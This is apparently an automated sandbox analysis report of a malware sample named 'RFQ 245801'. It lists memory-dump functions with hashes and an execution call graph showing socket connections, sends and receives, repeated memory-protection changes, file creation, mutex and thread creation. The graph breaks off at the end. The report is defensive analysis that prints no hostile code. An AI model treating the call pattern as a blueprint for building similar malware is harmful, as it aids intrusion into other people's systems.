                                                                                                                                                                                  Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                                                                  • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                                                                                                                                                  Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                                                                  • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                                                                                                                                                  • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                                                                                                                                                  Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                                                                                                                                                  • Execute=1, xrefs: 01794713
                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                                                                                                                                                  • ExecuteOptions, xrefs: 017946A0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                                                                  • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                                                                  • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                                                                                                                                                  Function 017F6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction ID: 3245c9b7563af3ce16c41bba3c1a241256f08534930d4d83e0f41b77b2d81365
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 85020371508342AFD709CF18C494A6BFBE5EFC8700F548A2DBA998B364DB31E945CB52
                                                                                                                                                                                  Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                                                                                                                                                  Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                                  • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                                                                  • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                                                                  • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                                                                                                                  Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                                                                  • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                                                                  • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                                                                                                                  Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                                                                  • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                                                                                                                  • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                                                                                                                  Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 017972A3
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                                                                  • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                                                                                                                  • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                                                                                                                  Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                                                                  • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                                                                                                                  Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                                                                                                                  Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                  • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                                                                  • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:4.7%
                                                                                                                                                                                  Total number of Nodes:444
                                                                                                                                                                                  Total number of Limit Nodes:15
                                                                                                                                                                                  execution_graph 13803 fba8f7a 13804 fba8fb8 13803->13804 13805 fba55b2 socket 13804->13805 13807 fba9081 13804->13807 13814 fba9022 13804->13814 13805->13807 13806 fba9134 13808 fba5732 connect 13806->13808 13813 fba91b2 13806->13813 13806->13814 13807->13806 13809 fba9117 getaddrinfo 13807->13809 13807->13814 13808->13813 13809->13806 13810 fba56b2 send 13812 fba9729 13810->13812 13811 fba97f4 setsockopt recv 13811->13814 13812->13811 13812->13814 13813->13810 13813->13814 13927 fba783a 13928 fba7841 13927->13928 13929 fba8f82 6 API calls 13928->13929 13931 fba78c5 13929->13931 13930 fba7906 13931->13930 13932 fba8232 NtCreateFile 13931->13932 13932->13930 13855 fba10fb 13857 fba1137 13855->13857 13856 fba12d5 13857->13856 13858 fb9d8f2 NtProtectVirtualMemory 13857->13858 13859 fba128a 13858->13859 13860 fb9d8f2 NtProtectVirtualMemory 13859->13860 13863 fba12a9 13860->13863 13861 fba12cd 13862 fba4382 ObtainUserAgentString 13861->13862 13862->13856 13863->13861 13864 fb9d8f2 NtProtectVirtualMemory 13863->13864 13864->13861 13839 fba50b9 13840 fba51f0 13839->13840 13841 fba50ed 13839->13841 13841->13840 13842 fba8f82 6 API calls 13841->13842 13842->13840 13843 fba38be 13844 fba38c3 13843->13844 13845 fba39a6 13844->13845 13846 fba3995 ObtainUserAgentString 13844->13846 13846->13845 13740 fba0fbf 13743 fba1016 13740->13743 13741 fba10f0 13742 fba10e8 13744 fba4382 ObtainUserAgentString 13742->13744 13743->13741 13745 fba10bb 13743->13745 13746 fb9d8f2 NtProtectVirtualMemory 13743->13746 13744->13741 13745->13742 13747 fb9d8f2 NtProtectVirtualMemory 13745->13747 13746->13745 13747->13742 13732 fba8232 13734 fba825c 13732->13734 13735 fba8334 13732->13735 13733 fba8410 NtCreateFile 13733->13735 13734->13733 13734->13735 13769 fb9e5f1 13770 fb9e60e 13769->13770 13771 fb9e606 13769->13771 13773 fba3662 13771->13773 13774 fba366b 13773->13774 13780 fba37ba 13773->13780 13775 fb9d0f2 6 API calls 13774->13775 13774->13780 13777 fba36ee 13775->13777 13776 fba3750 13779 fba383f 13776->13779 13776->13780 13781 fba3791 13776->13781 13777->13776 13778 fba8f82 6 API calls 13777->13778 13778->13776 13779->13780 13782 fba8f82 6 API calls 13779->13782 13780->13770 13781->13780 13783 fba8f82 6 API calls 13781->13783 13782->13780 13783->13780 13865 fb9d0f1 13866 fb9d109 13865->13866 13870 fb9d1d3 13865->13870 13867 fb9d012 6 API calls 13866->13867 13868 fb9d113 13867->13868 13869 fba8f82 6 API calls 13868->13869 13868->13870 13869->13870 13748 fbaa9b3 13749 fbaa9bd 13748->13749 13752 fb9f6d2 13749->13752 13751 fbaa9e0 13753 fb9f6f7 13752->13753 13755 fb9f704 13752->13755 13754 fb9d0f2 6 API calls 13753->13754 13756 fb9f6ff 13754->13756 13755->13756 13757 fb9f72d 13755->13757 13759 fb9f737 13755->13759 13756->13751 13761 fba52c2 13757->13761 13759->13756 13760 fba8f82 6 API calls 13759->13760 13760->13756 13762 fba52cb 13761->13762 13763 fba52df 13761->13763 13762->13763 13765 fba50c2 13762->13765 13763->13756 13766 fba51f0 13765->13766 13767 fba50cb 13765->13767 13766->13763 13767->13766 13768 fba8f82 6 API calls 13767->13768 13768->13766 13784 fbaa9f1 13785 fbaa9f7 13784->13785 13788 fb9f852 13785->13788 13787 fbaaa0f 13789 fb9f8e4 13788->13789 13790 fb9f865 13788->13790 13789->13787 13790->13789 13792 fb9f887 13790->13792 13794 fb9f87e 13790->13794 13791 fba536f 13791->13787 13792->13789 13793 fba3662 6 API calls 13792->13793 13793->13789 13794->13791 13795 fba50c2 6 API calls 13794->13795 13795->13791 13871 fba12f4 13872 fba1349 13871->13872 13873 fba149f 13872->13873 13875 fb9d8f2 NtProtectVirtualMemory 13872->13875 13874 fb9d8f2 NtProtectVirtualMemory 13873->13874 13878 fba14c3 13873->13878 13874->13878 13876 fba1480 13875->13876 13877 fb9d8f2 NtProtectVirtualMemory 13876->13877 13877->13873 13879 fba1597 13878->13879 13880 fb9d8f2 NtProtectVirtualMemory 13878->13880 13881 fb9d8f2 NtProtectVirtualMemory 13879->13881 13884 fba15bf 13879->13884 13880->13879 13881->13884 13882 fba16e1 13883 fba4382 ObtainUserAgentString 13882->13883 13886 fba16e9 13883->13886 13885 fba16b9 13884->13885 13887 fb9d8f2 NtProtectVirtualMemory 13884->13887 13885->13882 13888 fb9d8f2 NtProtectVirtualMemory 13885->13888 13887->13885 13888->13882 13933 fba422a 13934 fba425e 13933->13934 13935 fba38c2 ObtainUserAgentString 13934->13935 13936 fba426b 13935->13936 13847 fbaaaa9 13848 fbaaaaf 13847->13848 13851 fba5212 13848->13851 13850 fbaaac7 13852 fba521b 13851->13852 13853 fba5237 13851->13853 13852->13853 13854 fba50c2 6 API calls 13852->13854 13853->13850 13854->13853 13800 fba572e 13801 fba576a 13800->13801 13802 fba5788 connect 13800->13802 13801->13802 13568 fba9bac 13569 fba9bb1 13568->13569 13602 fba9bb6 13569->13602 13603 fb9fb72 13569->13603 13571 fba9c2c 13572 fba9c85 13571->13572 13574 fba9c69 13571->13574 13575 fba9c54 13571->13575 13571->13602 13573 fba7ab2 NtProtectVirtualMemory 13572->13573 13578 fba9c8d 13573->13578 13576 fba9c6e 13574->13576 13577 fba9c80 13574->13577 13579 fba7ab2 NtProtectVirtualMemory 13575->13579 13580 fba7ab2 NtProtectVirtualMemory 13576->13580 13577->13572 13581 fba9c97 13577->13581 13639 fba1102 13578->13639 13583 fba9c5c 13579->13583 13584 fba9c76 13580->13584 13585 fba9cbe 13581->13585 13586 fba9c9c 13581->13586 13625 fba0ee2 13583->13625 13631 fba0fc2 13584->13631 13589 fba9cd9 13585->13589 13590 fba9cc7 13585->13590 13585->13602 13607 fba7ab2 13586->13607 13593 fba7ab2 NtProtectVirtualMemory 13589->13593 13589->13602 13592 fba7ab2 NtProtectVirtualMemory 13590->13592 13595 fba9ccf 13592->13595 13596 fba9ce5 13593->13596 13649 fba12f2 13595->13649 13667 fba1712 13596->13667 13605 fb9fb93 13603->13605 13604 fb9fcce 13604->13571 13605->13604 13606 fb9fcb5 CreateMutexExW 13605->13606 13606->13604 13609 fba7adf 13607->13609 13608 fba7ebc 13617 fba0de2 13608->13617 13609->13608 13679 fb9d8f2 13609->13679 13611 fba7e5c 13612 fb9d8f2 NtProtectVirtualMemory 13611->13612 13613 fba7e7c 13612->13613 13614 fb9d8f2 NtProtectVirtualMemory 13613->13614 13615 fba7e9c 13614->13615 13616 fb9d8f2 NtProtectVirtualMemory 13615->13616 13616->13608 13619 fba0df0 13617->13619 13618 fba0ecd 13621 fb9d412 13618->13621 13619->13618 13704 fba4382 13619->13704 13623 fb9d440 13621->13623 13622 fb9d473 13622->13602 13623->13622 13624 fb9d44d CreateThread 13623->13624 13624->13602 13627 fba0f06 13625->13627 13626 fba0fa4 13626->13602 13627->13626 13628 fb9d8f2 NtProtectVirtualMemory 13627->13628 13629 fba0f9c 13628->13629 13630 fba4382 ObtainUserAgentString 13629->13630 13630->13626 13632 fba1016 13631->13632 13635 fba10bb 13632->13635 13636 fba10f0 13632->13636 13637 fb9d8f2 NtProtectVirtualMemory 13632->13637 13633 fba10e8 13634 fba4382 ObtainUserAgentString 13633->13634 13634->13636 13635->13633 13638 fb9d8f2 NtProtectVirtualMemory 13635->13638 13636->13602 13637->13635 13638->13633 13640 fba1137 13639->13640 13641 fba12d5 13640->13641 13642 fb9d8f2 NtProtectVirtualMemory 13640->13642 13641->13602 13643 fba128a 13642->13643 13644 fb9d8f2 NtProtectVirtualMemory 13643->13644 13647 fba12a9 13644->13647 13645 fba12cd 13646 fba4382 ObtainUserAgentString 13645->13646 13646->13641 13647->13645 13648 fb9d8f2 NtProtectVirtualMemory 13647->13648 13648->13645 13650 fba1349 13649->13650 13651 fba149f 13650->13651 13653 fb9d8f2 NtProtectVirtualMemory 13650->13653 13652 fb9d8f2 NtProtectVirtualMemory 13651->13652 13657 fba14c3 13651->13657 13652->13657 13654 fba1480 13653->13654 13655 fb9d8f2 NtProtectVirtualMemory 13654->13655 13655->13651 13656 fba1597 13659 fb9d8f2 NtProtectVirtualMemory 13656->13659 13660 fba15bf 13656->13660 13657->13656 13658 fb9d8f2 NtProtectVirtualMemory 13657->13658 13658->13656 13659->13660 13663 fba16b9 13660->13663 13665 fb9d8f2 NtProtectVirtualMemory 13660->13665 13661 fba16e1 13662 fba4382 ObtainUserAgentString 13661->13662 13664 fba16e9 13662->13664 13663->13661 13666 fb9d8f2 NtProtectVirtualMemory 13663->13666 13664->13602 13665->13663 13666->13661 13668 fba1767 13667->13668 13669 fb9d8f2 NtProtectVirtualMemory 13668->13669 13673 fba1903 13668->13673 13670 fba18e3 13669->13670 13671 fb9d8f2 NtProtectVirtualMemory 13670->13671 13671->13673 13672 fba19b7 13674 fba4382 ObtainUserAgentString 13672->13674 13675 fb9d8f2 NtProtectVirtualMemory 13673->13675 13676 fba1992 13673->13676 13677 fba19bf 13674->13677 13675->13676 13676->13672 13678 fb9d8f2 NtProtectVirtualMemory 13676->13678 13677->13602 13678->13672 13680 fb9d987 13679->13680 13683 fb9d9b2 13680->13683 13694 fb9e622 13680->13694 13682 fb9dc0c 13682->13611 13683->13682 13684 fb9dba2 13683->13684 13686 fb9dac5 13683->13686 13685 fba9e12 NtProtectVirtualMemory 13684->13685 13693 fb9db5b 13685->13693 13698 fba9e12 13686->13698 13688 fba9e12 NtProtectVirtualMemory 13688->13682 13689 fb9dae3 13689->13682 13690 fb9db3d 13689->13690 13691 fba9e12 NtProtectVirtualMemory 13689->13691 13692 fba9e12 NtProtectVirtualMemory 13690->13692 13691->13690 13692->13693 13693->13682 13693->13688 13695 fb9e67a 13694->13695 13696 fb9e67e 13695->13696 13697 fba9e12 NtProtectVirtualMemory 13695->13697 13696->13683 13697->13695 13702 fba8942 13698->13702 13700 fba9e45 NtProtectVirtualMemory 13701 fba9e70 13700->13701 13701->13689 13703 fba8967 13702->13703 13703->13700 13705 fba43c7 13704->13705 13708 fba4232 13705->13708 13707 fba4438 13707->13618 13709 fba425e 13708->13709 13712 fba38c2 13709->13712 13711 fba426b 13711->13707 13713 fba3934 13712->13713 13714 fba39a6 13713->13714 13715 fba3995 ObtainUserAgentString 13713->13715 13714->13711 13715->13714 13937 fb9e42e 13938 fb9e45b 13937->13938 13945 fb9e4c9 13937->13945 13939 fba8232 NtCreateFile 13938->13939 13938->13945 13940 fb9e496 13939->13940 13941 fb9e4c5 13940->13941 13942 fb9e082 NtCreateFile 13940->13942 13943 fba8232 NtCreateFile 13941->13943 13941->13945 13944 fb9e4b6 13942->13944 13943->13945 13944->13941 13946 fb9df52 NtCreateFile 13944->13946 13946->13941 13889 fba2ce2 13891 fba2dd9 13889->13891 13890 fba3022 13891->13890 13895 fba2352 13891->13895 13893 fba2f0d 13893->13890 13904 fba2792 13893->13904 13897 fba239e 13895->13897 13896 fba258e 13896->13893 13897->13896 13898 fba24ec 13897->13898 13900 fba2595 13897->13900 13899 fba8232 NtCreateFile 13898->13899 13902 fba24ff 13899->13902 13900->13896 13901 fba8232 NtCreateFile 13900->13901 13901->13896 13902->13896 13903 fba8232 NtCreateFile 13902->13903 13903->13896 13905 fba27e0 13904->13905 13906 fba8232 NtCreateFile 13905->13906 13910 fba290c 13906->13910 13907 fba2af3 13907->13893 13908 fba2352 NtCreateFile 13908->13910 13909 fba2602 NtCreateFile 13909->13910 13910->13907 13910->13908 13910->13909 13911 fba52e4 13912 fba536f 13911->13912 13913 fba5305 13911->13913 13913->13912 13914 fba50c2 6 API calls 13913->13914 13914->13912 13819 fb9fb66 13821 fb9fb6a 13819->13821 13820 fb9fcce 13821->13820 13822 fb9fcb5 CreateMutexExW 13821->13822 13822->13820 13796 fba0dd9 13797 